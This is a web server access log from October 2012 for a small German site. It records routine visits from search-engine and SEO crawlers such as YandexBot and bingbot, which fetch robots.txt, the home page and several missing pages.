202.85.220.77 - - [25/Oct/2012:16:22:19 +0200] "GET /robots.txt HTTP/1.0" 404 320 "-" "nutch-1.4/Nutch-1.4"
202.85.220.77 - - [25/Oct/2012:16:22:20 +0200] "GET / HTTP/1.0" 200 1229 "-" "nutch-1.4/Nutch-1.4"
178.154.179.250 - - [25/Oct/2012:17:51:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
157.55.34.99 - - [25/Oct/2012:18:34:13 +0200] "t: www.dialyse-calw.de" 400 329 "-" "-"
157.55.35.38 - - [25/Oct/2012:20:26:53 +0200] "GET /robots.txt HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
178.154.179.250 - - [25/Oct/2012:20:36:15 +0200] "GET /robots.txt HTTP/1.1" 404 328 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
157.55.35.38 - - [25/Oct/2012:20:40:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.35.38 - - [25/Oct/2012:20:40:03 +0200] "GET /referenzen.htm HTTP/1.1" 404 326 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.33.110 - - [25/Oct/2012:20:40:29 +0200] "GET /leistungen.htm HTTP/1.1" 404 326 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.33.47 - - [25/Oct/2012:20:40:48 +0200] "GET /index.htm HTTP/1.1" 404 321 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.33.47 - - [25/Oct/2012:20:42:16 +0200] "GET /fotoshow/fotoshow.htm HTTP/1.1" 404 333 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
176.9.122.87 - - [25/Oct/2012:21:44:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "webinatorbot 1.0; +http://www.webinator.de"
176.9.51.140 - - [25/Oct/2012:22:33:55 +0200] "GET /robots.txt HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
176.9.51.140 - - [25/Oct/2012:22:33:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; SISTRIX Crawler; http://crawler.sistrix.net/)"
62.219.8.226 - - [25/Oct/2012:22:41:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible)"
157.55.34.98 - - [25/Oct/2012:22:52:17 +0200] "t: www.dialyse-calw.de" 400 329 "-" "-"
178.154.179.250 - - [25/Oct/2012:23:36:52 +0200] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
178.154.179.250 - - [25/Oct/2012:23:48:59 +0200] "GET /robots.txt HTTP/1.1" 404 322 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
178.154.179.250 - - [26/Oct/2012:01:15:55 +0200] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
178.154.179.250 - - [26/Oct/2012:01:53:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
178.154.179.250 - - [26/Oct/2012:02:08:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
178.154.179.250 - - [26/Oct/2012:04:11:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
157.55.35.98 - - [26/Oct/2012:04:16:26 +0200] "GET /robots.txt HTTP/1.1" 404 337 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.35.98 - - [26/Oct/2012:04:19:37 +0200] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
178.154.179.250 - - [26/Oct/2012:04:27:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
178.154.179.250 - - [26/Oct/2012:06:28:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
194.153.113.7 - - [26/Oct/2012:08:52:57 +0200] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; oBot/2.3.1; +http://filterdb.iss.net/crawler/)"
194.153.113.35 - - [26/Oct/2012:10:20:27 +0200] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; oBot/2.3.1; +http://filterdb.iss.net/crawler/)"
